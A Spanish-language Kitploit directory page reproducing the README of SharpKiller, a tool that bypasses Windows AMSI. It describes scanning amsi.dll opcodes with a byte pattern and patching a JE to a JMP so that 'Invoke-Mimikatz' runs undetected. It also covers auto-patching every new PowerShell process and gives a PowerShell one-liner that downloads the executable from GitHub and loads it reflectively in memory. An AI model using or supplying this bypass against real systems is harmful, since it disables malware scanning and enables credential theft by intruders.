Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SharpKiller — Bypass de AMSI de por vida por @ZeroMemoryEx portado a .NET Framework 4.8 | Kitploit
Herramientas/GitHubGitHub/s1lkys/sharpkiller
Escalada de PrivilegiosExplotaciónEvasión de IDS/IPSPost-ExplotaciónRed TeamingDesarrollo de Payloads
GitHubs1lkys/sharpkiller

SharpKiller

Bypass de AMSI de por vida por @ZeroMemoryEx portado a .NET Framework 4.8

Ver Repositorio
35143hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SharpKiller

Bypass de AMSI de por vida: AMSI-Killer de @ZeroMemoryEx portado a .NET Framework 4.8.

Se requiere ofuscación adicional

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/SharpKiller.A&ThreatID=2147895059

Funciones recientemente integradas:

[ x ] - Escaneo en vivo de nuevos procesos de powershell cada 0,5 segundos -> Parchea automáticamente nuevas instancias de powershell

Compilación de la solución

  • Establezca su plataforma explícitamente a x64 en Compilar > Administrador de configuraciones

¿Cómo funciona?

Escaneo de opcodes

  • Obtenemos la dirección exacta de la instrucción de salto buscando el primer byte de cada instrucción; esta técnica es eficaz incluso ante actualizaciones o modificaciones del conjunto de datos objetivo.

  • por ejemplo :

    | 48:85D2 | test rdx, rdx |

    | 74 3F | je amsi.7FFAE957C694 |

    | 48 : 85C9 | test rcx, rcx |

    | 74 3A | je amsi.7FFAE957C694 |

    | 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |

    | 74 33 | je amsi.7FFAE957C694 |

  • el patrón de búsqueda será así :

    { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}

    image

Parche

Antes del parche

  • El programa compara el valor de RDX consigo mismo. Si la comparación evalúa a 0, el programa ejecuta un salto para retornar. De lo contrario, el programa continúa evaluando la siguiente instrucción.

    image

  • no podemos ejecutar "Invoke-Mimikatz"

    image

Después del parche

  • Parcheamos el primer byte y lo cambiamos de JE a JMP para que retorne directamente.

    Screenshot 2023-02-26 195848

    image

  • ahora podemos ejecutar "Invoke-Mimikatz"

Procesos recién creados

  • Sharp-Killer parcheará cualquier proceso de Powershell recién creado casi en tiempo real.

Demostración en video

video

OneLiner para ejecutar con reflection

root@kitploit:~
$url = "https://github.com/S1lkys/SharpKiller/releases/download/1.1/Sharp-Killer.exe"; $cli = New-Object System.Net.WebClient; $sk=[System.Reflection.Assembly]::Load([byte[]]( $cli.DownloadData($url)));$vars = New-Object System.Collections.Generic.List[System.Object];$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static";$sk.EntryPoint.Invoke($null,@(,$passed));

¿Este error ocurre al usar el OneLiner mencionado?

Si alguna vez viste este mensaje y te preguntaste sobre él: ¡bienvenido a la interfaz AMSI de .NET! :-)

root@kitploit:~
Exception calling "Load" with "1" argument(s): "Could not load file or assembly '288768 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."
  • https://s3cur3th1ssh1t.github.io/Powershell-and-the-.NET-AMSI-Interface/

Referencias:

  • https://github.com/ZeroMemoryEx/Amsi-Killer
Descargar herramienta